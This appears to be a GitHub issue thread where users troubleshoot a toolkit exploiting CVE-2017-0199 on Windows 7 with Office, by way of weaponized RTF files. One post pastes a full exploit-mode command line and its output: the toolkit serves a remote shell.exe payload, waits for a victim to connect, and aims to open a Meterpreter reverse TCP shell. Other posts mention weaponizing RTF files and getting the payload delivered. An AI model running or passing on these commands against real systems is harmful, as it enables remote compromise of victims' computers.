Closed xillwillx closed 7 years ago
disregard, read the other issues posted prior, looks like a fresh install win7 is not affected, https://www.youtube.com/watch?v=ac6LM7WAx64
updated to IE11 on win7 and the code works
Umm can you tell me how did you do it?
@xillwillx , I hope you were able to deliver the payload by upgrading IE.
@bhdresh yep worked right away , so im assuming an update also updates mshta.exe to allow this to work
@Windogeabella im just wrapping up an article on a complete walkthrough using this code and metasploit, and also manually creating your own weaponized RTf file from scratch
root@kali:~/Desktop/CVE-2017-0199# python cve-2017-0199_toolkit.py -M exp -e http://192.168.1.101/shell.exe -l /tmp/shell.exe Running exploit mode (Deliver HTA + Local Payload) - waiting for victim to connect Server Running on : 80 Received GET method from 192.168.1.115
nothing pulling the meterpreter reverse tcp, tried on win7 with fresh install and office 2013